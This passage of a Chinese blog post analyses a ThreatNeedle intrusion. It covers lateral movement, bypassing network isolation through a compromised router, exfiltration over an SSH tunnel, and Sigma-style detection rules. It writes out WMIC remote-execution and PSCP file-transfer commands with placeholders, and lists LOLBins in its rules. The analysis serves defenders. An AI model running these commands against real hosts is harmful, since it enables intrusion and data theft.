2&gt;&amp;1\"<\/pre>\n<p>\u63a5\u4e0b\u6765\uff0c\u8be5\u884c\u4e3a\u4eba\u4f7f\u7528Windows Management Instrumentation Command-line\uff08WMIC\uff09\u5c06\u6076\u610f\u8f6f\u4ef6\u590d\u5236\u5230\u8fdc\u7a0b\u4e3b\u673a\u5e76\u542f\u52a8\u3002<\/p>\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"generic\">wmic.exe \/node:[IP address] \/user:\"[user name]\" \/password:\"[password]\" PROCESS CALL CREATE \"cmd.exe \/c $appdata\\Adobe\\adobe.bat\"\r\nwmic.exe \/node:[IP address] \/user:\"[user name]\" \/password:\"[password]\" PROCESS CALL CREATE \"cmd \/c sc queryex helpsvc &gt; $temp\\tmp001.dat\"<\/pre>\n<p>&nbsp;<\/p>\n<h1 id=\"id-\u4e5d\u3001\u7a81\u7834\u7f51\u7edc\u9694\u79bb\" class=\"ct-heading\" data-diff-id=\"ct-diff-id-1pc0yOWY\"><span class=\"ez-toc-section\" id=\"%E4%B9%9D%E3%80%81%E7%AA%81%E7%A0%B4%E7%BD%91%E7%BB%9C%E9%9A%94%E7%A6%BB\"><\/span>\u4e5d\u3001\u7a81\u7834\u7f51\u7edc\u9694\u79bb<span class=\"ez-toc-section-end\"><\/span><\/h1>\n<p data-diff-id=\"ct-diff-id-inNggsXz\">\u88ab\u653b\u51fb\u7684\u4f01\u4e1a\u7f51\u7edc\u88ab\u5206\u4e3a\u4e24\u4e2a\u90e8\u5206\uff1a\u516c\u53f8\u7f51\u7edc\uff08\u53ef\u4ee5\u8bbf\u95ee\u4e92\u8054\u7f51\uff09\u548c\u9650\u5236\u6027\u7f51\u7edc\uff08\u5b58\u653e\u654f\u611f\u6570\u636e\uff0c\u4e0d\u80fd\u8bbf\u95ee\u4e92\u8054\u7f51\uff09\u3002\u6839\u636e\u4f01\u4e1a\u653f\u7b56\uff0c\u8fd9\u4e24\u4e2a\u90e8\u5206\u4e4b\u95f4\u4e0d\u5141\u8bb8\u4f20\u8f93\u4fe1\u606f\u3002\u6362\u53e5\u8bdd\u8bf4\uff0c\u8fd9\u4e24\u4e2a\u90e8\u5206\u662f\u8981\u5b8c\u5168\u5206\u5f00\u7684\u3002<\/p>\n<p data-diff-id=\"ct-diff-id-Grjh99uG\">\u4f46\u5728\u88ab\u653b\u51fb\u7684\u673a\u5668\u4e2d\uff0c\u6709\u8be5\u4f01\u4e1aIT\u57fa\u7840\u8bbe\u65bd\u7684\u7ba1\u7406\u5458\u4f7f\u7528\u7684\u673a\u5668\u3002 \u503c\u5f97\u6ce8\u610f\u7684\u662f\uff0c\u7ba1\u7406\u5458\u53ef\u4ee5\u540c\u65f6\u8fde\u63a5\u5230\u516c\u53f8\u548c\u53d7\u9650\u7f51\u6bb5\uff0c\u4ee5\u7ef4\u62a4\u7cfb\u7edf\u5e76\u4e3a\u7528\u6237\u4f9b\u4e24\u4e2a\u533a\u57df\u7684\u6280\u672f\u652f\u6301\u3002\u56e0\u6b64\uff0c\u901a\u8fc7\u83b7\u5f97\u5bf9\u7ba1\u7406\u5458\u5de5\u4f5c\u7ad9\u7684\u63a7\u5236\uff0c\u653b\u51fb\u8005\u80fd\u591f\u8bbf\u95ee\u53d7\u9650\u7f51\u6bb5\u3002 \u7136\u800c\uff0c\u7531\u4e8e\u5728\u7f51\u6bb5\u4e4b\u95f4\u76f4\u63a5\u8def\u7531\u6d41\u91cf\u662f\u4e0d\u53ef\u80fd\u7684\uff0c\u653b\u51fb\u8005\u65e0\u6cd5\u4f7f\u7528\u4ed6\u4eec\u7684\u6807\u51c6\u6076\u610f\u8f6f\u4ef6\u96c6\u5c06\u6570\u636e\u4ece\u53d7\u9650\u7f51\u6bb5\u6e17\u51fa\u5230C2\u3002 \u60c5\u51b5\u57287\u67082\u65e5\u53d1\u751f\u4e86\u53d8\u5316\uff0c\u653b\u51fb\u8005\u6210\u529f\u5730\u83b7\u5f97\u4e86\u7ba1\u7406\u5458\u7528\u6765\u8fde\u63a5\u4e24\u4e2a\u7f51\u6bb5\u7cfb\u7edf\u7684\u8def\u7531\u5668\u7684\u51ed\u8bc1\u3002\u8def\u7531\u5668\u662f\u4e00\u4e2a\u8fd0\u884cCentOS\u7684\u865a\u62df\u673a\uff0c\u6839\u636e\u9884\u5b9a\u4e49\u7684\u89c4\u5219\u5728\u51e0\u4e2a\u7f51\u7edc\u63a5\u53e3\u4e4b\u95f4\u8def\u7531\u6d41\u91cf\u3002<\/p>\n<p data-diff-id=\"ct-diff-id-Grjh99uG\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-801\" title=\"b4cf7c787721010337b2ee2c9f1472d1\" src=\"http:\/\/weizn.net\/wp-content\/uploads\/2021\/08\/b4cf7c787721010337b2ee2c9f1472d1.png\" alt=\"b4cf7c787721010337b2ee2c9f1472d1\" width=\"1556\" height=\"784\" srcset=\"http:\/\/weizn.net\/wp-content\/uploads\/2021\/08\/b4cf7c787721010337b2ee2c9f1472d1.png 1556w, http:\/\/weizn.net\/wp-content\/uploads\/2021\/08\/b4cf7c787721010337b2ee2c9f1472d1-768x387.png 768w, http:\/\/weizn.net\/wp-content\/uploads\/2021\/08\/b4cf7c787721010337b2ee2c9f1472d1-1536x774.png 1536w, http:\/\/weizn.net\/wp-content\/uploads\/2021\/08\/b4cf7c787721010337b2ee2c9f1472d1-1170x590.png 1170w, http:\/\/weizn.net\/wp-content\/uploads\/2021\/08\/b4cf7c787721010337b2ee2c9f1472d1-585x295.png 585w\" sizes=\"auto, (max-width: 1556px) 100vw, 1556px\" \/><\/p>\n<blockquote>\n<p data-diff-id=\"ct-diff-id-Grjh99uG\">\u6b64\u5904\u7f3a\u5931\u4e86\u653b\u51fb\u8005\u662f\u5982\u4f55\u83b7\u53d6\u5230router\u7ba1\u7406\u9875\u9762\u51ed\u636e\u7684\u7ec6\u8282\uff0c\u4f46\u731c\u6d4b\u662f\u56e0\u4e3a\u63a7\u5236\u4e86IT\u7ba1\u7406\u5458\u7684\u673a\u5668\uff0cdump\u4e86\u6d4f\u89c8\u5668\u51ed\u636e\u3002<\/p>\n<\/blockquote>\n<p data-diff-id=\"ct-diff-id-CDuH4T6o\">\u6839\u636e\u6536\u96c6\u5230\u7684\u8bc1\u636e\uff0c\u653b\u51fb\u8005\u626b\u63cf\u4e86\u8def\u7531\u5668\u7684\u7aef\u53e3\uff0c\u53d1\u73b0\u4e86\u4e00\u4e2aWebmin\u754c\u9762\u3002 \u63a5\u4e0b\u6765\uff0c\u653b\u51fb\u8005\u4f7f\u7528\u4e00\u4e2a\u7279\u6743\u6839\u8d26\u6237\u767b\u5f55\u5230Web\u754c\u9762\u3002\u76ee\u524d\u8fd8\u4e0d\u77e5\u9053\u653b\u51fb\u8005\u662f\u5982\u4f55\u83b7\u5f97\u8be5\u8d26\u6237\u7684\u51ed\u8bc1\u7684\uff0c\u4f46\u6709\u53ef\u80fd\u8be5\u51ed\u8bc1\u88ab\u4fdd\u5b58\u5728\u53d7\u611f\u67d3\u7cfb\u7edf\u7684\u4e00\u4e2a\u6d4f\u89c8\u5668\u5bc6\u7801\u7ba1\u7406\u5668\u4e2d\u3002<\/p>\n<p data-diff-id=\"ct-diff-id-Ok5Q55HQ\">\u653b\u51fb\u8005\u767b\u5165\u865a\u62df\u8def\u7531\u5668\uff1a<\/p>\n<p data-diff-id=\"ct-diff-id-Ok5Q55HQ\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-802\" title=\"41baf470a380cba0daf3206ec6afa6b0\" src=\"http:\/\/weizn.net\/wp-content\/uploads\/2021\/08\/41baf470a380cba0daf3206ec6afa6b0.png\" alt=\"41baf470a380cba0daf3206ec6afa6b0\" width=\"1672\" height=\"450\" srcset=\"http:\/\/weizn.net\/wp-content\/uploads\/2021\/08\/41baf470a380cba0daf3206ec6afa6b0.png 1672w, http:\/\/weizn.net\/wp-content\/uploads\/2021\/08\/41baf470a380cba0daf3206ec6afa6b0-768x207.png 768w, http:\/\/weizn.net\/wp-content\/uploads\/2021\/08\/41baf470a380cba0daf3206ec6afa6b0-1536x413.png 1536w, http:\/\/weizn.net\/wp-content\/uploads\/2021\/08\/41baf470a380cba0daf3206ec6afa6b0-1170x315.png 1170w, http:\/\/weizn.net\/wp-content\/uploads\/2021\/08\/41baf470a380cba0daf3206ec6afa6b0-585x157.png 585w\" sizes=\"auto, (max-width: 1672px) 100vw, 1672px\" \/><\/p>\n<p data-diff-id=\"ct-diff-id-Ok5Q55HQ\">\u901a\u8fc7\u8fdb\u5165\u914d\u7f6e\u9762\u677f\uff0c\u653b\u51fb\u8005\u914d\u7f6e\u4e86Apache\u7f51\u7edc\u670d\u52a1\u5668\uff0c\u5e76\u5f00\u59cb\u4f7f\u7528\u8def\u7531\u5668\u4f5c\u4e3a\u8be5\u7ec4\u7ec7\u7684\u4f01\u4e1a\u548c\u9650\u5236\u533a\u95f4\u7684\u4ee3\u7406\u670d\u52a1\u5668\u3002<\/p>\n<blockquote>\n<p data-diff-id=\"ct-diff-id-Ok5Q55HQ\">\u731c\u6d4b\u662f\u901a\u8fc7apache\u914d\u7f6e\u4e86\u6b63\u5411HTTP\u4ee3\u7406\u3002<\/p>\n<\/blockquote>\n<p data-diff-id=\"ct-diff-id-Ok5Q55HQ\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-803\" title=\"bcdeeda8b942d61ad83970e3a7237fe1\" src=\"http:\/\/weizn.net\/wp-content\/uploads\/2021\/08\/bcdeeda8b942d61ad83970e3a7237fe1.png\" alt=\"bcdeeda8b942d61ad83970e3a7237fe1\" width=\"1380\" height=\"522\" srcset=\"http:\/\/weizn.net\/wp-content\/uploads\/2021\/08\/bcdeeda8b942d61ad83970e3a7237fe1.png 1380w, http:\/\/weizn.net\/wp-content\/uploads\/2021\/08\/bcdeeda8b942d61ad83970e3a7237fe1-768x291.png 768w, http:\/\/weizn.net\/wp-content\/uploads\/2021\/08\/bcdeeda8b942d61ad83970e3a7237fe1-1170x443.png 1170w, http:\/\/weizn.net\/wp-content\/uploads\/2021\/08\/bcdeeda8b942d61ad83970e3a7237fe1-585x221.png 585w\" sizes=\"auto, (max-width: 1380px) 100vw, 1380px\" \/><\/p>\n<blockquote>\n<p data-diff-id=\"ct-diff-id-Ok5Q55HQ\">\u6b64\u5904\u7f3a\u5931\u653b\u51fb\u8005\u5982\u4f55\u77e5\u9053SSH\u5bc6\u7801\u7684\uff0c\u63a8\u6d4b\u548cweb\u51ed\u636e\u4e00\u81f4\uff0c\u6216web\u754c\u9762\u53ef\u914d\u7f6essh\u670d\u52a1\u3002<\/p>\n<\/blockquote>\n<p data-diff-id=\"ct-diff-id-g611oleo\">\u6b64\u540e\u6570\u5929\uff0c\u53732020\u5e747\u670810\u65e5\uff0c\u653b\u51fb\u8005\u8fde\u63a5\u5230\u8def\u7531\u5668\u901a\u8fc7SSH\uff0c\u5728\u5176\u4e2d\u4e00\u53f0\u88ab\u611f\u67d3\u7684\u673a\u5668\u4e0a\u8bbe\u7f6e\u4e86PuTTyPSCP\uff08PuTTY\u5b89\u5168\u62f7\u8d1d\u5ba2\u6237\u7aef\uff09\u5de5\u5177\u3002\u8fd9\u4e2a\u5de5\u5177\u88ab\u7528\u6765\u4e0a\u4f20\u6076\u610f\u8f6f\u4ef6\u5230\u8def\u7531\u5668\u7684\u865a\u62df\u673a\u3002\u8fd9\u4f7f\u653b\u51fb\u8005\u80fd \u591f\u5c06\u6076\u610f\u8f6f\u4ef6\u653e\u7f6e\u5728\u4f01\u4e1a\u7f51\u7edc\u7684\u9650\u5236\u6027\u90e8\u5206\u7684\u7cfb\u7edf\u4e0a\uff0c\u4f7f\u7528\u8def\u7531\u5668\u6765\u6258\u7ba1\u6076\u610f\u6837\u672c \u3002\u6b64\u5916\uff0c\u5728\u7f51\u7edc\u9650\u5236\u533a\u6bb5\u8fd0\u884c\u7684\u6076\u610f\u8f6f\u4ef6\u80fd\u591f\u901a\u8fc7\u8bbe\u7f6e\u5728\u540c\u4e00\u53f0\u8def\u7531\u5668\u4e0a\u7684Apache\u670d\u52a1\u5668\u5c06\u6536\u96c6\u5230\u7684\u6570\u636e\u5916\u6cc4\u5230\u547d\u4ee4\u548c\u63a7\u5236\u670d\u52a1\u5668\u3002<\/p>\n<p data-diff-id=\"ct-diff-id-mIoZKKMO\">\u653b\u51fb\u8005\u5165\u4fb5\u865a\u62df\u8def\u7531\u5668\u540e\u7684\u65b0\u7684\u8fde\u63a5\u62d3\u6251\u56fe\uff1a<\/p>\n<p data-diff-id=\"ct-diff-id-mIoZKKMO\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-804\" title=\"edb7792577adfc9aef907b8f1be2e249\" src=\"http:\/\/weizn.net\/wp-content\/uploads\/2021\/08\/edb7792577adfc9aef907b8f1be2e249.png\" alt=\"edb7792577adfc9aef907b8f1be2e249\" width=\"1554\" height=\"788\" srcset=\"http:\/\/weizn.net\/wp-content\/uploads\/2021\/08\/edb7792577adfc9aef907b8f1be2e249.png 1554w, http:\/\/weizn.net\/wp-content\/uploads\/2021\/08\/edb7792577adfc9aef907b8f1be2e249-768x389.png 768w, http:\/\/weizn.net\/wp-content\/uploads\/2021\/08\/edb7792577adfc9aef907b8f1be2e249-1536x779.png 1536w, http:\/\/weizn.net\/wp-content\/uploads\/2021\/08\/edb7792577adfc9aef907b8f1be2e249-1170x593.png 1170w, http:\/\/weizn.net\/wp-content\/uploads\/2021\/08\/edb7792577adfc9aef907b8f1be2e249-585x297.png 585w\" sizes=\"auto, (max-width: 1554px) 100vw, 1554px\" \/><\/p>\n<p data-diff-id=\"ct-diff-id-mIoZKKMO\">\u5728\u9694\u79bb\u533a\u57df\u7684\u6076\u610f\u8f6f\u4ef6\u6837\u672c\uff0c\u5176\u4e2d\u6709\u4f5c\u4e3a\u4ee3\u7406\u670d\u52a1\u5668\u4f7f\u7528\u7684\u8def\u7531\u5668\u7684\u786c\u7f16\u7801URL\uff1a<\/p>\n<p data-diff-id=\"ct-diff-id-mIoZKKMO\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-805\" title=\"a07e84b22fd7d3921695ba36d3e2a0ca\" src=\"http:\/\/weizn.net\/wp-content\/uploads\/2021\/08\/a07e84b22fd7d3921695ba36d3e2a0ca.png\" alt=\"a07e84b22fd7d3921695ba36d3e2a0ca\" width=\"1670\" height=\"302\" srcset=\"http:\/\/weizn.net\/wp-content\/uploads\/2021\/08\/a07e84b22fd7d3921695ba36d3e2a0ca.png 1670w, http:\/\/weizn.net\/wp-content\/uploads\/2021\/08\/a07e84b22fd7d3921695ba36d3e2a0ca-768x139.png 768w, http:\/\/weizn.net\/wp-content\/uploads\/2021\/08\/a07e84b22fd7d3921695ba36d3e2a0ca-1536x278.png 1536w, http:\/\/weizn.net\/wp-content\/uploads\/2021\/08\/a07e84b22fd7d3921695ba36d3e2a0ca-1170x212.png 1170w, http:\/\/weizn.net\/wp-content\/uploads\/2021\/08\/a07e84b22fd7d3921695ba36d3e2a0ca-585x106.png 585w\" sizes=\"auto, (max-width: 1670px) 100vw, 1670px\" \/><\/p>\n<p data-diff-id=\"ct-diff-id-mIoZKKMO\">\u653b\u51fb\u8005\u5728centos\u8def\u7531\u5668\u4e0a\u7ecf\u5e38\u5220\u9664\u65e5\u5fd7\uff1a<\/p>\n<p data-diff-id=\"ct-diff-id-mIoZKKMO\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone wp-image-806\" title=\"4adcd14914f764902564a99e368122e0\" src=\"http:\/\/weizn.net\/wp-content\/uploads\/2021\/08\/4adcd14914f764902564a99e368122e0.png\" alt=\"4adcd14914f764902564a99e368122e0\" width=\"471\" height=\"260\" srcset=\"http:\/\/weizn.net\/wp-content\/uploads\/2021\/08\/4adcd14914f764902564a99e368122e0.png 634w, http:\/\/weizn.net\/wp-content\/uploads\/2021\/08\/4adcd14914f764902564a99e368122e0-585x323.png 585w\" sizes=\"auto, (max-width: 471px) 100vw, 471px\" \/><\/p>\n<p data-diff-id=\"ct-diff-id-mIoZKKMO\">\u653b\u51fb\u8005\u8fd8\u5728\u8def\u7531\u5668\u865a\u62df\u673a\u4e0a\u8fd0\u884c\u4e86nmap\u5de5\u5177\uff0c\u5e76\u626b\u63cf\u4e86\u4f01\u4e1a\u7f51\u7edc\u9650\u5236\u6bb5\u5185\u7cfb\u7edf\u7684\u7aef\u53e3\u30029\u670827\u65e5\uff0c\u653b\u51fb\u8005\u5f00\u59cb\u4ece\u8def\u7531\u5668\u4e0a\u6e05\u9664\u4ed6\u4eec\u6d3b\u52a8\u7684\u6240\u6709\u75d5\u8ff9\uff0c\u4f7f\u7528 logrotate\u5de5\u5177\u6765\u8bbe\u7f6e\u81ea\u52a8\u5220\u9664\u65e5\u5fd7\u6587\u4ef6\u3002<\/p>\n<h1 id=\"id-\u5341\u3001\u6570\u636e\u6e17\u51fa\" class=\"ct-heading\" data-diff-id=\"ct-diff-id-4yOw7aJE\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-808\" title=\"b29c83e92381b84caeaa74a09e3a5134\" src=\"http:\/\/weizn.net\/wp-content\/uploads\/2021\/08\/b29c83e92381b84caeaa74a09e3a5134.png\" alt=\"b29c83e92381b84caeaa74a09e3a5134\" width=\"1666\" height=\"272\" srcset=\"http:\/\/weizn.net\/wp-content\/uploads\/2021\/08\/b29c83e92381b84caeaa74a09e3a5134.png 1666w, http:\/\/weizn.net\/wp-content\/uploads\/2021\/08\/b29c83e92381b84caeaa74a09e3a5134-768x125.png 768w, http:\/\/weizn.net\/wp-content\/uploads\/2021\/08\/b29c83e92381b84caeaa74a09e3a5134-1536x251.png 1536w, http:\/\/weizn.net\/wp-content\/uploads\/2021\/08\/b29c83e92381b84caeaa74a09e3a5134-1170x191.png 1170w, http:\/\/weizn.net\/wp-content\/uploads\/2021\/08\/b29c83e92381b84caeaa74a09e3a5134-585x96.png 585w\" sizes=\"auto, (max-width: 1666px) 100vw, 1666px\" \/><\/h1>\n<p>&nbsp;<\/p>\n<h1 class=\"ct-heading\" data-diff-id=\"ct-diff-id-4yOw7aJE\"><span class=\"ez-toc-section\" id=\"%E5%8D%81%E3%80%81%E6%95%B0%E6%8D%AE%E6%B8%97%E5%87%BA\"><\/span>\u5341\u3001\u6570\u636e\u6e17\u51fa<span class=\"ez-toc-section-end\"><\/span><\/h1>\n<p>\u653b\u51fb\u8005\u8005\u8bd5\u56fe\u4ece\u51e0\u4e2a\u88ab\u63a7\u5236\u7684\u670d\u52a1\u5668\u4e3b\u673a\u521b\u5efaSSH\u96a7\u9053\u5230\u4f4d\u4e8e\u97e9\u56fd\u7684\u8fdc\u7a0b\u670d\u52a1\u5668\u3002 \u4ed6\u4eec\u4f7f\u7528\u4e00\u4e2a\u5b9a\u5236\u7684\u96a7\u9053\u5de5\u5177\u6765\u5b9e\u73b0\u8fd9\u4e00\u76ee\u7684\u3002 \u8be5\u5de5\u5177\u63a5\u6536\u56db\u4e2a\u53c2\u6570\uff1a\u5ba2\u6237\u7aefIP\u5730\u5740\u3001\u5ba2\u6237\u7aef\u7aef\u53e3\u3001\u670d\u52a1\u5668IP\u5730\u5740\u548c\u670d\u52a1\u5668\u7aef\u53e3 \u3002\u8be5\u5de5\u5177\u63d0\u4f9b\u57fa\u672c\u529f\u80fd\uff0c\u5c06\u5ba2\u6237\u7aef\u6d41\u91cf\u8f6c\u53d1\u5230\u670d\u52a1\u5668\u3002\u4e3a\u4e86\u907f\u514d\u660e\u6587\u4f20\u8f93\uff0c\u4f7f\u7528\u4e86\u4ea6\u6216\u52a0\u5bc6\u901a\u8baf\uff1a<\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"alignnone wp-image-807\" title=\"8abc10b86e01e8451dbc4d071fe56476\" src=\"http:\/\/weizn.net\/wp-content\/uploads\/2021\/08\/8abc10b86e01e8451dbc4d071fe56476.png\" alt=\"8abc10b86e01e8451dbc4d071fe56476\" width=\"560\" height=\"296\" srcset=\"http:\/\/weizn.net\/wp-content\/uploads\/2021\/08\/8abc10b86e01e8451dbc4d071fe56476.png 942w, http:\/\/weizn.net\/wp-content\/uploads\/2021\/08\/8abc10b86e01e8451dbc4d071fe56476-768x406.png 768w, http:\/\/weizn.net\/wp-content\/uploads\/2021\/08\/8abc10b86e01e8451dbc4d071fe56476-585x309.png 585w\" sizes=\"auto, (max-width: 560px) 100vw, 560px\" \/><\/p>\n<p>\u4f7f\u7528 PuTTy PSCP\u8fdc\u7a0b\u4f20\u8f93\u6587\u4ef6\uff1a<\/p>\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"generic\">%APPDATA%\\PBL\\unpack.tmp -pw [password] root@[IP address]:\/tmp\/cab0215 %APPDATA%\\PBL\\cab0215.tmp<\/pre>\n<p>&nbsp;<\/p>\n<h1 id=\"id-\u68c0\u6d4b\u4e0e\u9632\u5fa1\" class=\"ct-heading\" data-diff-id=\"ct-diff-id-TFgwcPru\"><span class=\"ez-toc-section\" id=\"%E6%A3%80%E6%B5%8B%E4%B8%8E%E9%98%B2%E5%BE%A1\"><\/span>\u68c0\u6d4b\u4e0e\u9632\u5fa1<span class=\"ez-toc-section-end\"><\/span><\/h1>\n<blockquote><p><strong><span data-size=\"19\">\u76ee\u6807\u662f\u68c0\u6d4b\u653b\u51fb\u65b9\u6cd5\u672c\u8eab\uff0c\u800c\u4e0d\u662f\u7279\u5b9a\u7684IoC\u3002<\/span><\/strong><\/p><\/blockquote>\n<h5 data-diff-id=\"ct-diff-id-277kkItY\"><span class=\"ez-toc-section\" id=\"1%E3%80%81%E9%82%AE%E4%BB%B6%E6%B2%99%E7%AE%B1%E5%AF%B9%E4%BA%8E%E5%AE%8F%E6%96%87%E6%A1%A3%E7%9A%84%E6%A3%80%E6%B5%8B\"><\/span>1\u3001\u90ae\u4ef6\u6c99\u7bb1\u5bf9\u4e8e\u5b8f\u6587\u6863\u7684\u68c0\u6d4b<span class=\"ez-toc-section-end\"><\/span><\/h5>\n<h5 data-diff-id=\"ct-diff-id-2UbDpNWF\"><span class=\"ez-toc-section\" id=\"2%E3%80%81%E9%92%93%E9%B1%BC%E6%96%87%E6%A1%A3%E5%9C%A8%E5%8F%97%E5%AE%B3%E8%80%85%E7%94%B5%E8%84%91%E4%B8%8A%E6%89%A7%E8%A1%8C%E7%9A%84%E8%A1%8C%E4%B8%BA\"><\/span>2\u3001\u9493\u9c7c\u6587\u6863\u5728\u53d7\u5bb3\u8005\u7535\u8111\u4e0a\u6267\u884c\u7684\u884c\u4e3a<span class=\"ez-toc-section-end\"><\/span><\/h5>\n<div class=\"penci-tpadding-2\">\n<h6 data-diff-id=\"ct-diff-id-xVdmdxjl\"><span class=\"ez-toc-section\" id=\"1%EF%BC%89%E5%90%AF%E5%8A%A8%E7%9B%AE%E5%BD%95%E5%88%9B%E5%BB%BA%E6%96%87%E4%BB%B6\"><\/span>1\uff09\u542f\u52a8\u76ee\u5f55\u521b\u5efa\u6587\u4ef6<span class=\"ez-toc-section-end\"><\/span><\/h6>\n<p data-diff-id=\"ct-diff-id-xVdmdxjl\">\u901a\u8fc7word\u6587\u6863\u521b\u5efa\u6587\u4ef6\u5c5e\u4e8e\u53ef\u7591\u884c\u4e3a\uff0c\u4f46\u7531\u4e8eLNK\u6587\u4ef6\u7684\u7279\u6b8a\u6027\uff0csysmon\u65e0\u6cd5\u76f4\u63a5\u91c7\u96c6\u5230LNK\u6587\u4ef6\u7684\u521b\u5efa\uff0c\u4f46\u76f8\u5173\u573a\u666f\u4ecd\u9700\u8986\u76d6\uff1a<\/p>\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"yaml\"># \u9493\u9c7c\u6587\u6863\u521b\u5efa\u53ef\u7591\u6587\u4ef6\r\ndetection:\r\n    event:\r\n        event_id: '11'\r\n    selection1:\r\n        event_data.Image:\r\n            - '*\\winword.exe'\r\n            - '*\\excel.exe'\r\n            - '*\\powerpnt.exe'\r\n            - '*\\outlook.exe'\r\n            - '*\\MSPUB.exe'\r\n            - '*\\VISIO.exe'\r\n    selection2:\r\n        event_data.TargetFilename:\r\n            - '*.bat'\r\n            - '*.vbs'\r\n            - '*.vb'\r\n    condition: event and selection1 and selection2<\/pre>\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"yaml\"># Windows\u81ea\u542f\u52a8\u76ee\u5f55\u65b0\u589e\u6587\u4ef6\r\ndetection:\r\n    selection1:\r\n        EventID: 11\r\n    selection2:\r\n        TargetFilename:\r\n            - 'C:*?Microsoft?Windows?Start Menu?Programs?StartUp?*'\r\n    whitelist1:\r\n        Image:\r\n            - 'C:?windows?explorer.exe'\r\n    whitelist2:\r\n        TargetFilename:\r\n            - '*appdata\\roaming\\microsoft\\windows\\start menu\\programs\\startup\\desktop.ini'\r\n    condition:  selection1 and selection2 and not whitelist1 and not whitelist2<\/pre>\n<h6 data-diff-id=\"ct-diff-id-j6FfGneX\"><span class=\"ez-toc-section\" id=\"2%EF%BC%89%E5%AD%90%E8%BF%9B%E7%A8%8B%E8%BF%90%E8%A1%8Crundll32\"><\/span>2\uff09\u5b50\u8fdb\u7a0b\u8fd0\u884crundll32<span class=\"ez-toc-section-end\"><\/span><\/h6>\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"generic\"># \u9493\u9c7c\u6587\u6863\u8fd0\u884c\u53ef\u7591\u5b50\u8fdb\u7a0b\r\ndetection:\r\n    event:\r\n        EventID: 1\r\n    selection1:\r\n        event_data.ParentImage:\r\n            - '*\\winword.exe'\r\n            - '*\\excel.exe'\r\n            - '*\\powerpnt.exe'\r\n            - '*\\outlook.exe'\r\n            - '*\\MSPUB.exe'\r\n            - '*\\VISIO.exe'\r\n    selection2:\r\n        event_data.OriginalFileName:\r\n            - 'cmd.exe'\r\n            - 'powershell.exe'\r\n            - 'wmic.exe'\r\n            - 'regsvr32.exe'\r\n            - 'psexec.c'\r\n            - 'bitsadmin.exe'\r\n            - 'wmiprvse.exe'\r\n            - 'cmstp.exe'\r\n            - 'InstallUtil.exe'\r\n            - 'MSBuild.exe'\r\n            - 'mshta.exe'\r\n            - 'sdbinst.exe'\r\n            - 'certutil.exe'\r\n            - 'conhost.exe'\r\n            - 'rundll32.exe'\r\n            - 'cscript.exe'\r\n            - 'sctasks.exe'\r\n            - 'wscript.exe'\r\n            - 'scriptrunner.exe'\r\n            - 'svchost.exe'\r\n            - 'forfiles.exe'\r\n            - 'scrcons'\r\n            # - 'msiexec.exe'  # office\u5b89\u88c5\u66f4\u65b0\u5305\u4f1a\u51fa\u73b0\u8fd9\u79cd\u60c5\u51b5\r\n    selection3:\r\n        event_data.CommandLine:\r\n            - '*http:\/\/*'\r\n            - '*https:\/\/*'\r\n    filter1:\r\n        event_data.OriginalFileName:\r\n            - 'chrome.exe'\r\n    filter2:\r\n        event_data.Description:\r\n            - '*\u6d4f\u89c8\u5668*'\r\n            - '*browser*'\r\n    filter3:\r\n        event_data.CommandLine:\r\n            - '*rundll32*pptassist.dll,dllcheckupdate*'\r\n            - '*\\spool\\*'\r\n            - '*pptassist.dll*'\r\n            - '*dllsendreportdataw*'\r\n            - '*rundll32*control_rundll*'\r\n            - '*.microsoft.com\/*'\r\n            - '*\\edge\\*'\r\n            - '*\\maxthon*'\r\n            - '*\\internet explorer*'\r\n            - '*officetemplate*'\r\n            - '*\\kismain.exe*'\r\n            - '*dispatchapicall*'\r\n            - '*wmic bios get SerialNumber*'\r\n            - '*PhotoViewer.dll*'\r\n            - '*:@*'\r\n    filter4:\r\n        event_data.ParentCommandLine:\r\n            - '* \/dde'\r\n    filter5:\r\n        event_data.Image:\r\n            - '*firefox*'\r\n    condition: event and selection1 and (selection2 or selection3) and not filter1 and not filter2 and not filter3 and not filter4 and not filter5<\/pre>\n<\/div>\n<h5 data-diff-id=\"ct-diff-id-RHcIDjz5\"><span class=\"ez-toc-section\" id=\"3%E3%80%81ThreatNeedle_Installer%E7%9A%84%E8%A1%8C%E4%B8%BA\"><\/span>3\u3001ThreatNeedle Installer\u7684\u884c\u4e3a<span class=\"ez-toc-section-end\"><\/span><\/h5>\n<div class=\"penci-tpadding-2\">\n<h6 data-diff-id=\"ct-diff-id-ZDVi1Bod\"><span class=\"ez-toc-section\" id=\"1%EF%BC%89%E6%B3%A8%E5%86%8C%E7%B3%BB%E7%BB%9F%E6%9C%8D%E5%8A%A1%E5%AE%9E%E7%8E%B0%E6%8C%81%E4%B9%85%E5%8C%96\"><\/span>1\uff09\u6ce8\u518c\u7cfb\u7edf\u670d\u52a1\u5b9e\u73b0\u6301\u4e45\u5316<span class=\"ez-toc-section-end\"><\/span><\/h6>\n<h6 data-diff-id=\"ct-diff-id-BhglAet6\"><span class=\"ez-toc-section\" id=\"2%EF%BC%89%E9%85%8D%E7%BD%AE%E4%BF%A1%E6%81%AF%E5%86%99%E5%85%A5%E5%88%B0%E6%B3%A8%E5%86%8C%E8%A1%A8\"><\/span>2\uff09\u914d\u7f6e\u4fe1\u606f\u5199\u5165\u5230\u6ce8\u518c\u8868<span class=\"ez-toc-section-end\"><\/span><\/h6>\n<\/div>\n<h5 data-diff-id=\"ct-diff-id-kwbATInE\"><span class=\"ez-toc-section\" id=\"4%E3%80%81ThreatNeedle_Loader%E7%9A%84%E8%A1%8C%E4%B8%BA\"><\/span>4\u3001ThreatNeedle Loader\u7684\u884c\u4e3a<span class=\"ez-toc-section-end\"><\/span><\/h5>\n<div class=\"penci-tpadding-2\">\n<h6 data-diff-id=\"ct-diff-id-R9EC5FEf\"><span class=\"ez-toc-section\" 